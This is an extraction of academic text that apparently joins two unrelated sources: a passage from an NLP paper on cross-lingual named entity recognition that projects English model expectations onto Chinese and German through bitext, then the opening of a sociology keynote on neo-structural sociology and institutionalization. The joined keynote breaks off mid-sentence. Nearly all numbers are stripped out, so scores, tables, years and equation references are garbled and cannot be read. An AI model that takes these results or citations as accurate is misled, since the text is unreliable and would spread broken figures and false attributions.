gradients of s(ep(y|xb;θ[φ]) for each unlabeled foreign sentence x and the constraints over this example φ . the gra- dients can be calculated as: ∂ ∂θ s(eθ[φ]) = − ∂ ∂θ ( φ̃−eθ[φ] )t ( φ̃−eθ[φ] ) = ( φ̃−eθ[φ] )t ( ∂ ∂θ eθ[φ] ) we redefine the penalty vector u = ( φ̃−eθ[φ] ) to be u. ∂ ∂θ eθ[φ] is a matrix where each column contains the gradients for a particular model feature θ with respect to all constraint functions φ. it can be in general, other loss functions such as kl-divergence can also be used for s. we found l to work well in practice. computed as: ∂ ∂θ eθ[φ] = ∑ y φ(y) ∂ ∂θ p(y|x; θ) = ∑ y φ(y) ∂ ∂θ ( z(x; θ) exp(θt f(x,y)) ) = ∑ y φ(y) ( z(x; θ) ( ∂ ∂θ exp(θt f(x,y)) ) + exp(θt f(x,y)) ( ∂ ∂θ z(x; θ) )) = ∑ y φ(y) ( p(y|x; θ)f(x,y)t −p(y|x; θ) ∑ y′ p(y′|x; θ)f(x,y′)t ) = ∑ y p(y|x; θ) ∑ y φ(y)f(x,y)t − (∑ y p(y|x; θ)φ(y) )(∑ y p(y|x; θ)f(x,y)t ) = covp(y|x;θ) (φ(y),f(x,y)) ( ) = eθ[φf t ]−eθ[φ]eθ[ft ] ( ) eqn. gives the intuition of how optimization works in ge. in each iteration of l-bfgs, the model pa- rameters are updated according to their covariance with the constraint features, scaled by the differ- ence between current expectation and target expec- tation. the term eθ[φft ] in eqn. can be com- puted using a dynamic programming (dp) algo- rithm, but solving it directly requires us to store a matrix of the same dimension as ft in each step of the dp. we can reduce the complexity by using the same trick as in (li and eisner, ) for com- puting expectation semiring. the resulting algo- rithm has complexity o(nm ), which is the same as the standard forward-backward inference algorithm for crf. (druck, , ) gives full details of this derivation. . hard vs. soft projection projecting expectations instead of one-best label as- signments from english to foreign language can be thought of as a soft version of the method de- scribed in (das and petrov, ) and (ganchev et al., ). soft projection has its advantage: when the english model is not certain about its predic- tions, we do not have to commit to the current best prediction. the foreign model has more freedom to form its own belief since any marginal distribu- tion it produces would deviates from a flat distri- bution by just about the same amount. in general, preserving uncertainties till later is a strategy that has benefited many nlp tasks (finkel et al., ). hard projection can also be treated as a special case in our framework. we can simply recalibrate pos- terior marginal of english by assigning probability mass to the most likely outcome, and zero ev- erything else out, effectively taking the argmax of the marginal at each word position. we refer to this version of expectation as the “hard” expecta- tion. in the hard projection setting, ge training re- sembles a “project-then-train” style semi-supervised crf training scheme (yarowsky and ngai, ; täckström et al., ). in such a training scheme, we project the one-best predictions of english crf to the foreign side through word alignments, then in- clude the newly “tagged” foreign data as additional training data to a standard crf in the foreign lan- guage. rather than projecting labels on a per-word basis, yarowsky and ngai ( ) also explored an alternative method for noun-phrase (np) bracketing task that amounts to projecting the spans of nps based on the observation that individual nps tend to retain their sequential spans across translations. we experimented with the same method for ner, but found that this method of projecting the ne spans does not help in reducing noise and actually lowers model performance. besides the difference in projecting expecta- tions rather than hard labels, our method and the “project-then-train” scheme also differ by optimiz- ing different objectives: crf optimizes maximum conditional likelihood of the observed label se- quence, whereas ge minimizes squared error be- tween model’s expectation and “hard” expectation based on the observed label sequence. in the case where squared error loss is replaced with a kl- divergence loss, ge has the same effect as marginal- izing out all positions with unknown projected la- bels, allowing more robust learning of uncertainties in the model. as we will show in the experimen- o per loc org gpe o per loc org gpe o per loc org misc o per loc org misc table : raw counts in the error confusion matrix of english crf models. top table contains the counts on ontonotes test data, and bottom table contains conll- test data counts. rows are the true la- bels and columns are the observed labels. for exam- ple, item at row , column of the top table reads: we observed times where the true label should be person, but english crf model output label lo- cation. tal results in section . , soft projection in combi- nation of the ge objective significantly outperforms the project-then-train style crf training scheme. . source-side noise an additional source of noise comes from errors generated by the source-side english crf mod- els. we know that the english crf models gives f score of . % on the ontonotes dataset for english-chinese experiment, and . % on the conll- dataset for english-german experiment. we present a simple way of modeling english-side noise by picturing the following process: the la- bels assigned by the english crf model (denoted as y) are some noised version of the true labels (de- noted as y∗). we can recover the probability of the true labels by marginalizing over the observed la- bels: p(y∗|x) = ∑ y p(y ∗|y)∗p(y|x). p(y|x) is the posterior probabilities given by the crf model, and we can approximate p(y∗|y) by the column- normalized error confusion matrix shown in table . this source-side noise model is likely to be overly simplistic. generally speaking, we could build much more sophisticated noising model for the source- side, possibly conditioning on context, or capturing higher-order label sequences. experiments we conduct experiments on chinese and german ner. we evaluate cliper in two learning set- tings: weakly supervised and semi-supervised. in the weakly supervised setting, we simulate the con- dition of having no labeled training data, and evalu- ate the model learned from bitext alone. we then vary the amount of labeled data available to the model, and examine the model’s learning curve. in the semi-supervised setting, we assume our model has access to the full labeled data; our goal is to improve performance of the supervised method by learning from additional bitext. . dataset and setup we used the latest version of stanford ner toolkit as our base crf model in all experiments. fea- tures for english, chinese and german crfs are documented extensively in (che et al., ) and (faruqui and padó, ) and omitted here for brevity. it it worth noting that the current stan- ford ner models include recent improvements from semi-supervise learning approaches that induces dis- tributional similarity features from large word clus- ters. these models represent the current state-of- the-art in supervised methods, and serve as a very strong baseline. for chinese ner experiments, we follow the same setup as che et al. ( ) to evaluate on the latest ontonotes (v . ) corpus (hovy et al., ). a total of , sentences from the parallel chinese and english penn treebank portion are reserved for evaluation. odd-numbered documents are used as development set, and even-numbered documents are held out as blind test set. the rest of ontonotes annotated with ner tags are used to train the en- glish and chinese crf base taggers. there are about k and k labeled sentences for chinese and english training, respectively. the english crf tag- ger trained on this training corpus gives f score of . % on the ontonotes test set. four enti- ties types are used for both chinese and english with a io tagging scheme. the english-chinese http://www-nlp.stanford.edu/ner ldc catalogue no.: ldc t file numbers: chtb - , ectb - person, location, organization and gpe. we did not adopt the commonly seen bio tagging scheme bitext comes from the foreign broadcast informa- tion service corpus (fbis). we randomly sampled k parallel sentence pairs to use as bitext in our experiments. it is first sentence aligned using the champollion tool kit, then word aligned with the berkeleyaligner. for german ner experiments, we evaluate us- ing the standard conll- ner corpus (sang and meulder, ). the labeled training set has k and k sentences, containing four entity types. an english crf model is also trained on the conll- english data with the same entity types. for bi- text, we used a randomly sampled set of k parallel sentences from the de-en portion of the news com- mentary dataset. the english crf tagger trained on conll- english training corpus gives f score of . % on the conll- test set. we report typed entity precision (p), recall (r) and f score. statistical significance tests are done using a paired bootstrap resampling method with iterations, averaged over runs. we com- pare against three recently approaches that were in- troduced in section . they are: semi-supervised learning method using factored bilingual models with gibbs sampling (wang et al., a); bilin- gual ner using integer linear programming (ilp) with bilingual constraints, by (che et al., ); and constraint-driven bilingual-reranking approach (burkett et al., ). the code from (che et al., ) and (wang et al., a) are publicly avail- able. code from (burkett et al., ) is obtained through personal communications. since the objective function in eqn. is non- convex, we adopted the early stopping training scheme from (turian et al., ) as the following: after each iteration in l-bfgs training, the model (ramshaw and marcus, ), because when projected across swapping word alignments, the “b-” and “i-” tag distinction may not be well-preserved and may introduce additional noise. the fbis corpus is a collection of radio news casts and contains translations of openly available news and information from media sources outside the united states. the ldc cata- logue no. is ldc e . champollion.sourceforge.net code.google.com/p/berkeleyaligner person, location, organization and miscella- neous. http://www.statmt.org/wmt / training-parallel-nc-v .tgz https://github.com/stanfordnlp/corenlp is evaluated against the development set; the train- ing procedure is terminated if no improvements have been made in iterations. . weakly supervised results figure a and b show results of weakly supervised learning experiments. quite remarkably, on chinese test set, our proposed method (cliper) achieves a f score of . % with k bitext, when no labeled training data is used. in contrast, the supervised crf baseline would require as much as k labeled sentences to attain the same accuracy. results on the german test set is less striking. with no labeled data and k of bitext, cliper performs at f of . %, the equivalent of using . k labeled examples in the supervised setting. when combined with k labeled examples, performance of cliper reaches %, a gain of over % absolute over supervised crf. we also notice that supervised crf model learns much faster in german than chinese. this result is not too surprising, since it is well recognized that chinese ner is more challenging than german or english. the best supervised results for chinese is - % (f score) behind best german and english super- vised results. chinese ner relies more on lexical- ized features, and therefore needs more labeled data to achieve good coverage. the results suggest that cliper seems to be very effective at transferring lexical knowledge from english to chinese. figure c and d compares soft ge projection with hard ge projection and the “project-then-train” style crf training scheme (cf. section . ). we observe that both soft and hard ge projection sig- nificantly outperform the “project-then-train” style training scheme. the difference is especially pro- nounced on the chinese results when fewer labeled examples are available. soft projection gives better accuracy than hard projection when no labeled data is available, and also has a faster learning rate. incorporating source-side noise using the method described in section . gives a small improvement on chinese with supervised data, increasing f score from . % to . %. this improvement is statis- tically significant at % confidence interval. how- ever, on the german data, we observe a tiny de- crease with no statistical significance in f score, dropping from . % to . %. a likely ex- planation of the difference is that the english crf model in the english-chinese experiment, which is trained on ontonotes data, has a much higher error rate ( . %) than the english crf model in the english-german experiment trained on conll- ( . %). therefore, modeling noise in the english- chinese case is likely to have a greater effect than the english-german case. . semi-supervised results in the semi-supervised experiments, we let the crf model use the full set of labeled examples in addi- tion to the unlabeled bitext. results on the test set are shown in table . all semi-supervised baselines are tested with the same number of unlabeled bitext as cliper in each language. the “project-then- train” semi-supervised training scheme severely hurts performance on chinese, but gives a small im- provement on german. moreover, on chinese it learns to achieve high precision but at a significant loss in recall. on german its behavior is the oppo- site. such drastic and erratic imbalance suggest that this method is not robust or reliable. the other three semi-supervised baselines (row - ) all show im- provements over the crf baseline, consistent with their reported results. clipers gives the best re- sults on both chinese and german, yielding statis- tically significant improvements over all baselines except for cwd on german. the hard projection version of cliper also gives sizable gain over crf. however, in comparison, clipers is superior. the improvements of clipers over crf on chinese test set is over . % in absolute f . the improvement over crf on german is almost a per- cent. to our knowledge, these are the best reported numbers on the ontonotes chinese and conll- german datasets. . efficiency another advantage of our proposed approach is ef- ficiency. because we eliminated the previous multi- stage “uptraining” paradigm, but instead integrating the semi-supervised and supervised objective into one joint objective, we are able to attain signifi- cant speed improvements over all methods except crfptt. table shows the required training time. # of labeled training sentences [k] f sc or e [% ] supervised crf clipper soft (a) chinese test # of labeled training sentences [k] f sc or e [% ] supervised crf clipper soft (b) german test # of labeled training sentences [k] f sc or e [% ] crf projection clipper hard clipper soft (c) soft vs. hard on chinese test # of labeled training sentences [k] f sc or e [% ] crf projection clipper hard clipper soft (d) soft vs. hard on german test [高岗] 纪念碑 在 [横山] 落成 a monument commemorating [vice president gao gangper ] was completed in [hengshanloc ] (e) word proceeding “monument” is person [碛口] [毛主席] 东渡 [黄河] 纪念碑 简介 introduction of [qikouloc ] [chairman maoper ] [yellow riverloc ] crossing monument (f) word proceeding “monument” is location figure : top four figures show performance curves of cliper with varying amounts of available labeled training data in a weakly supervised setting. vertical axes show the f score on the test set. performance curves of supervised crf and “project-then-train” crf are plotted for comparison. bottom two figures are examples of aligned sentence pairs in chinese and english. chinese german p r f p r f crf . . . . . . crfptt . . . . . . bpbk . . . . . . cwd . . . . . . wcd a . . . . . . wcd b . . . . . . cliperh . . . §‡ . . . ∗ clipers . . . §†? �∗ . . . ‡? ∗§ table : test set chinese, german ner results. best number of each column is highlighted in bold. crf is the supervised baseline. crfptt is the “project-then-train” semi-supervised scheme for crf. bpbk is (burkett et al., ), wcd is (wang et al., a), cwd a is (che et al., ), and wcd b is (wang et al., b) . clipers and cliperh are the soft and hard projections. § indicates f scores that are statistically significantly better than crf baseline at . % confidence level; ? marks significance over crfptt with . % con- fidence; † and ‡ marks significance over wcd with . % and % confidence; and � marks sig- nificance over cwd with . % confidence; ∗ marks significance over bpbk with . % con- fidence. discussions figure e and f give two examples of cross-lingual projection methods in action. both examples have a named entity that immediately proceeds the word “纪念碑” (monument) in the chinese sentence. in figure e, the word “高岗” has literal meaning of a hillock located at a high position, which also hap- pens to be the name of a former vice president of china. without having previously observed this word as a person name in the labeled training data, the crf model does not have enough evidence to believe that this is a person, instead of location. but the aligned words in english (“gao gang”) are clearly part of a person name as they were pre- ceded by a title (“vice president”). the english model has high expectation that the aligned chi- nese word of ”gao gang” is also a person. there- fore, projecting the english expectations to chinese provides a strong clue to help disambiguating this word. figure f gives another example: the word “黄河”(huang he, the yellow river of china) can chinese german crf m s m s crfptt m s m s wcd h m h m cwd a h m h m cwd b h m h m bpbk h m h m cliperh h m m s clipers h m m s table : timing stats during model training. be confused with a person name since “黄”(huang or hwang) is also a common chinese last name. . again, knowing the translation in english, which has the indicative word “river” in it, helps disam- biguation. the crfptt and cliperh methods successfully labeled these two examples correctly, but failed to produce the correct label for the example in fig- ure . on the other hand, a model trained with the clipers method does correctly label both entities in figure , demonstrating the merits of the soft pro- jection method. conclusion we introduced a domain and language independent semi-supervised method for training discriminative models by projecting expectations across bitext. ex- periments on chinese and german ner show that our method, learned over bitext alone, can rival per- formance of supervised models trained with thou- sands of labeled examples. furthermore, applying our method in a setting where all labeled examples are available also shows improvements over state-of- the-art supervised methods. our experiments also showed that soft expectation projection is more fa- vorable to hard projection. this technique can be generalized to all sequence labeling tasks, and can be extended to include more complex constraints. for future work, we plan to apply this method to more language pairs and also explore data selection strategies and modeling alignment uncertainties. in fact, a people search of the name 黄河 on the most pop- ular chinese social network (renren.com) returns over , matches. acknowledgments the authors would like to thank jennifer gillenwa- ter for a discussion that inspired this work, behrang mohit and nathan schneider for their help with the arabic ner data, and david burkett for providing the source code of their work for comparison. we would also like to thank editor lillian lee and the three anonymous reviewers for their valuable com- ments and suggestions. we gratefully acknowledge the support of the u.s. defense advanced research projects agency (darpa) broad operational lan- guage translation (bolt) program through ibm. any opinions, findings, and conclusion or recom- mendations expressed in this material are those of the authors and do not necessarily reflect the view of darpa, or the us government. references hiyan alshawi, srinivas bangalore, and shona douglas. . head-transducer models for speech translation and their automatic acquisition from bilingual data. machine translation, . rie kubota ando and tong zhang. . a high- performance semi-supervised learning method for text chunking. in proceedings of acl. kedar bellare, gregory druck, and andrew mccallum. . alternating projections for learning with expec- tation constraints. in proceedings of uai. avrim blum and tom mitchell. . combining la- beled and unlabeled data with co-training. in proceed- ings of colt. david burkett and dan klein. . two languages are better than one (for syntactic parsing). in proceedings of emnlp. david burkett, slav petrov, john blitzer, and dan klein. . learning better monolingual models with unan- notated bilingual text. in proceedings of conll. andrew carlson, justin betteridge, richard c. wang, es- tevam r. hruschka jr., and tom m. mitchell. . coupled semi-supervised learning for information ex- traction. in proceedings of wsdm. ming-wei chang, lev ratinov, and dan roth. . guiding semi-supervision with constraint- driven learning. in proceedings of acl. wanxiang che, mengqiu wang, and christopher d. man- ning. . named entity recognition with bilingual constraints. in proceedings of naacl. michael collins and yoram singer. . unsupervised models for named entity classification. in proceedings of emnlp. dipanjan das and slav petrov. . unsupervised part- of-speech tagging with bilingual graph-based projec- tions. in proceedings of acl. gregory druck and andrew mccallum. . high- performance semi-supervised learning using discrim- inatively constrained generative models. in proceed- ings of icml. gregory druck, gideon mann, and andrew mccallum. . leveraging existing resources using generalized expectation criteria. in proceedings of nips workshop on learning problem design. gregory druck, burr settles, and andrew mccallum. . active learning by labeling features. in pro- ceedings of emnlp. gregory druck. . generalized expectation criteria for lightly supervised learning. ph.d. thesis, univer- sity of massachusetts amherst. manaal faruqui and sebastian padó. . training and evaluating a german named entity recognizer with se- mantic generalization. in proceedings of konvens. jenny rose finkel, christopher d. manning, and an- drew y. ng. . solving the problem of cascading errors: approximate bayesian inference for linguistic annotation pipelines. in proceedings of emnlp. victoria fossum and steven abney. . automatically inducing a part-of-speech tagger by projecting from multiple source languages across aligned corpora. in proceedings of ijcnlp. kuzman ganchev and dipanjan das. . cross- lingual discriminative learning of sequence models with posterior regularization. in proceedings of emnlp. kuzman ganchev, jennifer gillenwater, and ben taskar. . dependency grammar induction via bitext pro- jection constraints. in proceedings of acl. kuzman ganchev, jo ao graça, jennifer gillenwater, and ben taskar. . posterior regularization for struc- tured latent variable models. jmlr, : – . andrew b. goldberg. . new directions in semi- supervised learning. ph.d. thesis, university of wisconsin-madison. eduard hovy, mitchell marcus, martha palmer, lance ramshaw, and ralph weischedel. . ontonotes: the % solution. in proceedings of naacl-hlt. dan klein. . the unsupervised learning of natural language structure. ph.d. thesis, stanford univer- sity. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: probabilis- tic models for segmenting and labeling sequence data. in proceedings of icml. zhifei li and jason eisner. . first- and second-order expectation semirings with applications to minimum- risk training on translation forests. in proceedings of emnlp. shen li, jo ao graça, and ben taskar. . wiki-ly supervised part-of-speech tagging. in proceedings of emnlp-conll. percy liang. . semi-supervised learning for natural language. master’s thesis, massachusetts institute of technology. gideon mann and andrew mccallum. . general- ized expectation criteria for semi-supervised learning with weakly labeled data. jmlr, : – . david mcclosky, eugene charniak, and mark johnson. . effective self-training for parsing. in proceed- ings of naacl-hlt. tahira naseem, benjamin snyder, jacob eisenstein, and regina barzilay. . multilingual part-of- speech tagging: two unsupervised approaches. jair, : – . slav petrov, pi-chuan chang, michael ringgaard, and hiyan alshawi. . uptraining for accurate deter- ministic question parsing. in proceedings of emnlp. lance a. ramshaw and mitchell p. marcus. . text chunking using transformation-based learning. natu- ral language processing using very large corpora, : – . rajhans samdani, ming-wei chang, and dan roth. . unified expectation maximization. in proceed- ings of naacl. erik f. tjong kim sang and fien de meulder. . in- troduction to the conll- shared task: language- independent named entity recognition. in proceedings of conll. vikas sindhwani, partha niyogi, and mikhail belkin. . a co-regularization approach to semi- supervised learning with multiple views. in proceed- ings of icml workshop on learning with multiple views, international conference on machine learn- ing. noah a. smith. . novel estimation methods for unsupervised discovery of latent structure in natu- ral language text. ph.d. thesis, johns hopkins uni- versity. benjamin snyder, tahira naseem, and regina barzilay. . unsupervised multilingual grammar induction. in proceedings of acl. jun suzuki and hideki isozaki. . semi-supervised sequential labeling and segmentation using giga-word scale unlabeled data. in proceedings of acl. oscar täckström, dipanjan das, slav petrov, ryan mc- donald, and joakim nivre. . token and type constraints for cross-lingual part-of-speech tagging. in proceedings of acl. joseph turian, lev ratinov, and yoshua bengio. . word representations: a simple and general method for semi-supervised learning. in proceedings of acl. mengqiu wang, wanxiang che, and christopher d. man- ning. a. effective bilingual constraints for semi- supervised learning of named entity recognizers. in proceedings of aaai. mengqiu wang, wanxiang che, and christopher d. man- ning. b. joint word alignment and bilingual named entity recognition using dual decomposition. in proceedings of acl. chenhai xi and rebecca hwa. . a backoff model for bootstrapping resources for non-english languages. in proceedings of hlt-emnlp. david yarowsky and grace ngai. . inducing mul- tilingual pos taggers and np bracketers via robust projection across aligned corpora. in proceedings of naacl. david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in proceed- ings of acl. microsoft word - volume _final insna.org | issues & | volume | networks and institutionalization: a neo-structural approach emmanuel lazega institut d’etudes politiques de paris, france centre de sociologie des organisations – cnrs eusn mainz keynote address for connections revised dec abstract this paper is the text prepared for the keynote address of the eusn conference in mainz, germany. a short presentation of concepts reflects in part the foundations of neo- structural sociology (nss) and its use of social and organisational network analyses, com- bined with other methodologies, to better understand the roles of structure and culture in indi- vidual and collective agency. the presentation shows how nss accounts for institutional change by focusing on the importance of combined relational infrastructures and rhetorics. specific characteristics of institutional entrepreneurs who punch above their weight in institu- tionalization processes are introduced for that purpose, particularly the importance of multi- status oligarchs, status heterogeneity, high-status inconsistencies, collegial oligarchies, con- flicts of interests and rhetorics of relative/false sacrifice. two empirical examples illustrate this approach. the first case focuses on a network study of the commercial court of paris, a -year-old judicial institution. the second case focuses on a network study of a field- configuring event (the so-called venice forum) lobbying for the emergence of a new europe- an jurisdiction, the unified patent court, and its attempt to create a common intellectual prop- erty regime for the continent. for sociologists, both examples involve “studying up”: they are cases of public/private joint regulation of markets bringing together these ingredients of insti- tutionalization. the conclusion suggests future lines of research that nss opens for the study of institutionalization, in particular using the dynamics of multi-level networks. one of the main issues raised by this approach is its contribution to the study of democratic deficits in a period of intense institutional change in europe. author emmanuel lazega is professor of sociology at the institut d’etudes politiques de paris and a membre of the centre de sociologie des organisations (cnrs). his current research projects focus on the dynamics of multi-level networks in organizations and markets, with a special focus on network modelling of social processes helping actors in such settings manage the dilemmas of their collective action (contemporary forms of solidarity, social control, learning and regulation). he is the author and co-editor of several books (for example the collegial phenomenon, oxford university press; micropolitics of knowledge, aldine-de gruyter; conventions and structures in economic organization, edited with olivier favereau, edward elgar publishing; multilevel network analysis for the social sciences, edited with tom a.b. snijders, springer; knowledge and networks, edited with johannes glückler and ingmar hammer). his publications can be downloaded from http://www.elazega.fr. i would like to thank the committees of eusn , particularly marina hennig, for the invitation to present this keynote address. connections networks and institutionalization | volume | issues & | insna.org introduction the outline of this address is the following. it will first briefly present a few concepts that belong to the foundations of neo- structural sociology (nss) (for a synthesis, see lazega, , a). the purpose of this sociology is to use social and organi- zational network analyses, combined with other methodologies, to better understand the roles of structure and culture in the processes of collective agency. it will then look at how nss contributes to under- standing institutional change as collective agency by focusing on the importance of relational infrastructures and rhetorics. it will next identify specific characteristics of institutional entrepreneurs who punch above their weight in institutionalization processes: the importance of high-status inconsistencies, collegial oligarchies, mul- ti-status oligarchs, conflicts of interests and rhetorics is hereby introduced. two empir- ical examples will be provided to illustrate this approach. for the sociologist, both ex- amples involve ‘studying up’: they are cas- es of public/private joint regulation of markets looking at these elements of insti- tutionalization. the first case focuses on the commercial court of paris, a -year- old judicial institution. the second case focuses on the emerging european unified patent court. the conclusion suggests fu- ture lines of research that nss opens up based on the study of institutionalization, in particular in the dynamics of multi-level networks. one of the main issues raised by this approach is that of democratic deficits in a period of intense institutional change in europe. foundations of neo-structural sociology neo-structural sociology brings together, very generally, structure, culture and ac- tion (both individual and collective action) in the organizational society. it relies on sophisticated analyses of socio- organizational networks, if possible multi- level and dynamic, and enriched with data on culture and behavior . the focus is on collective action, and especially on model- ling its generic social processes (learning and socialization, particularistic solidarity and discriminations, social control and conflict resolution, regulation and institu- tionalization). to theorize and model these processes, it is important to use the notion of relational infrastructures of collective action, particularly of collective action that relies on personalized ties between peers for coordination, elsewhere called collegi- ality . in order to frame the issue theoreti- cally, relationships, as indicators of inter- dependencies, are defined as both channels for resources with, and symbolic or moral commitments to, exchange partners. it is because relationships have both dimen- sions that they can become infrastructural. indeed, stabilized relationships are usually part of structures that are identified locally, in the entourage of the actors, as relational sub-structures with which we are all famil- iar, such as direct reciprocity, indirect reci- procity, transitivity, etc.; but also part of what can be called relational infrastruc- tures, such as vertical patterns of differen- tiations (mainly heterogeneous forms of status coexisting in complex ways) and horizontal patterns of differentiations (mainly social niches in a system of nich- es) at a morphological level. in particular, relational infrastructures combined with norms facilitate generic social processes helping members manage the dilemmas of their collective actions. using combina- contemporary neo-structuralism is different from the structuralism of claude lévi- strauss and of the s mainly because it relies on a theory of individual and collective action to provide a new fundamental link between structure and process. the articulation between culture and structure, however, was already present in the ‘old’ structuralism. this also means that understanding collec- tive action in ideal, typically speaking bu- reaucratized settings, based on routines, hie- rarchy and impersonal ties, does not need much social network analysis. networks and institutionalization connections insna.org | issues & | volume | tions of relational infrastructures and rela- tional sub-structures in social and organi- zational networks, we have modelled sev- eral generic processes , such as solidarities with direct and indirect reciprocity in vari- ous multiplex networks; social control in lateral control regimes using personal rela- tionships for collective goals; collective learning with various kinds of advice seek- ing networks; and regulation and institu- tionalization as political processes, that are the focus of this talk. thus, nss reframes the recursive dynamics of social structure and social processes. a focus on relational infrastructures in institutionalization processes institutions are commonly and broadly de- fined as rules, norms, and beliefs that de- scribe reality for actors, explaining what is and is not, what can be acted upon and what cannot, and how (hall & taylor, ; hoffman, ; scott, ; bathelt & glückler, ). the focus is on the norms, mutual expectations and beliefs about issues and the legitimate organiza- tional ways in which related behavior has to be normed and governed. a classical question in the social sciences is: ‘how do such institutions emerge?’ our work in this area owes much to collaboration, initiated by harrison white in , with institu- tional economists, in particular olivier fa- vereau (see favereau and lazega, ; lazega a). in the era of ‘governance’ (weakening of command and control framework of states) that we witnessed over the last decades, this neo-structural sociology has blossomed in economic so- ciology, by focusing on collective action in joint (public authorities and private actors, including business) regulation of markets. since , nss has owed much to julien neo-structural publications about these pro- cesses including theoretical, empirical and methodological work developing a neo- structural theory of institutionalization are available online: www.elazega.fr > http://elazega.fr/?m= brailly, catherine comet, fabien eloire, guillaume favre, lise mounier, jaime montes-lihn, mohamed oubenal, elise penalva-icher, alvaro pina-stranger, tom snijders, paola tubaro, marta varanda, and many others. contemporary thinking about the emergence of institutions is dominated in sociology by a variety of neo-institutional perspectives focusing on ‘institutional en- trepreneurs’ (dimaggio, ) who elabo- rate on taken-for-granted cultural catego- ries, classifications, rules and procedures that include beliefs and codes stabilizing action into routines. in this literature, struc- tural dimensions of regulation are largely ignored. yet in his work on what he calls ‘precarious values’, selznick ( ) al- ready provides an early combination of a structural and an institutional perspective in sociology. a precarious value is one that is essential to the viability of the collectivi- ty but in which most members may have no direct stake. in this illustration of the entanglement of structure and culture, a value is therefore precarious because it is always in danger of losing its flag carriers and representatives, that is, the active sup- port by organized interest groups and elites that helps preserve it as a candidate for priority on the list of all competing values. we argue that, in organizational so- cieties (perrow, ), where power is ex- tremely concentrated, this relational and cultural perspective enriches the study of institutionalization processes by focusing on their often collegial, elitist and person- alized nature. in this process, the selection of priority norms and the personalized se- lection of the authorities who champion them is an important process in the crea- tion of frames of reference that become taken for granted over time, and thus insti- tutionalized. therefore, the creation of an oligarchy of actors, who are able to guide the regulatory process and to mobilize fol- lowers by helping them align with new rules, are key underlying mechanisms that belong to the institutionalization process as theorized by selznick and encapsulated in his notion of precarious values. connections networks and institutionalization | volume | issues & | insna.org today the focus is on the process of regulation and institutionalization. there is something remarkable in the way relational infrastructures are mobilized in political, regulatory, institution building processes: their efficiency comes from the constitu- tion of collegial oligarchies whose mem- bers take advantage of situations of con- flicts of interests to concentrate power (lazega, b). high-status inconsistencies and conflicts of interests: punching above their weight in institutionalization process we are not equal in our capacity to defend our regulatory interests, even in egalitarian systems. very generally speaking, neo- structural sociology starts with the princi- ple that divergent interests and forced in- terdependencies complexify the regulatory process and development of institutions. it requires an understanding of interdepend- encies as relational infrastructures that are often conflictual, dynamic and multi-level. modelling social processes in terms of networks adds much to the reflection on the way individual and collective agents defend their regulatory interests in institu- tionalization processes, and therefore to joint regulation as a social and political process. selznick’s connection between structure and culture is still illuminating today with respect to understanding institu- tion building by small networks of top- level institutional entrepreneurs that we call collegial oligarchies. at a very high level of generality, defining norms for col- lective action, i.e. the political process in a collectivity, depends upon who are the ac- tors promoting these rules, what are their strategies to carry out this regulation with- in the system of their interdependencies, and what are the relational infrastructures that they are able to create and mobilize to do that. in this spirit, neo-structural sociol- ogy looks at institution building by explor- ing the relational dimension of ‘institution- al work’ (lawrence, suddaby and leca, ) or political work (lahille, ; christopoulos and ingold, ), i.e. at the system of interdependencies in collegial oligarchies of institutional entrepreneurs involved in institutional framing. in particular the neo-structural ap- proach to regulatory activity reveals the ways in which strategic agents politicise their exchanges, especially by building re- lational infrastructures, for example, social niches or forms of social status. control- ling those relational infrastructures gives them a structural position that enables them to frame or guide the negotiation of rules, including building forms of consen- sus and normative alignments that are more or less long lasting. observing the inconsistencies between these forms of sta- tus proves to be a powerful tool in the analysis of regulatory process . the notion that different, heterogeneous dimensions of status could be socially inconsistent has a long history in sociology (hughes, ; lenski, ) . it helps with substantiating the complex link between political work and position within the structure because political actors, as institutional entrepre- neurs, try to both accumulate power and increase their legitimacy. indeed, in the po- litical process, it is not enough to simply assert that the strongest impose their own rules. rather, neo-structural analyses show that it is often improbable agents occupy- ing heterogeneous and inconsistent dimen- sions of social statuses, i.e. in a position of ‘conflict of interest’, who have the greatest influence in the political work of institu- tional transformation, of defining selz- nick’s ‘precarious values’ as priority rules. these inconsistencies are also the reason for difficulties in properly specifying status in statistical network models (lazega, mou- nier, snijders and tubaro, ). “coexistence of a number of parallel verti- cal hierarchies which are usually imper- fectly correlated with each other. (…) certain units may be consistently high or consistenly low, while others may com- bine high standing with respect to certain status variables with low status with respect to other variables” (lenski, : ). networks and institutionalization connections insna.org | issues & | volume | examples of how relational infrastructure, particularly complex and inconsistent forms of status, matter in institutionaliza- tion of norms in micro- or macro-political controversies (lazega, : chapter ) abound. analyses based on this approach show, for example, how financial indus- tries play a specific role of ‘discrete regu- lators’ (huault & richard, ). the study of regulation networks shared be- tween public bodies and private agents shows how proactive and how capable of guiding regulatory work the latter are. the financial sector is not the only powerful agent in terms of institutional work but its traditionally dual (economic and political) character gives it a specific role in many regulatory processes. this is precisely be- cause of its capacity to benefit from status heterogeneity, high-status inconsistencies and conflicts of interest. this allows it to become – in part – its own regulator, and to dominate and capture, for example, ju- dicial institutions. structure, culture and broken promises: combining high-status inconsistency with rhetorics of sacrifice why are members with several, heteroge- neous, high and inconsistent forms of sta- tus – multi-status oligarchs – particularly efficient as institutional entrepreneurs when operating in collegial oligarchies and using conflicts of interests? neo-structural sociology has long contributed to research in this area (compared, for example, with owen-smith & powell, ; glückler, suddaby & lenz, forthcoming) not only by framing institutionalization in these terms but by explaining the efficiency of high- status inconsistency. this efficiency relies on the agents’ ability to lose status on one dimension and use a rhetoric of sacrifice to ‘manage the losers’ of the institutionaliza- tion process (lazega, ) – i.e. to man- age actors who stand to lose out from changes in the rules. these multi-status ol- igarchs are not just boundary spanners: they are improbable linchpins with high probability of being either sidelined or punching above their weight. they have to choose, for example, between broadening their constituency (with a view to the long- term stability of the institution) and estab- lishing oligarchic closure. indeed, since actors organize their collective action around projects and rules, changing the rules is equivalent to break- ing promises made to these actors. using a position of high-status inconsistency is ef- ficient in terms of institution building when actors are able to combine a form of power (control of resources that others need, i.e. finance, expertise, technique, time, law, etc.) with a form of legitimacy (discourse on behalf of the collective about the value of the new norms that is consid- ered credible and compatible with its over- all project). this credibility is increased when change of rules is presented as a cause of loss of status for the institutional entrepreneurs themselves. this loss of sta- tus is often presented as personal ‘sacri- fice’ of status for the common good. but this loss is very relative, if not false, when this ‘sacrifice’ jeopardizes one dimension of status without jeopardizing the other high and uncorrelated dimension of status. combined with other factors, this justifica- tion of broken promises is thus more likely to obtain normative alignment from the losers of the process – those who had pre- viously organized themselves around the former rules – without 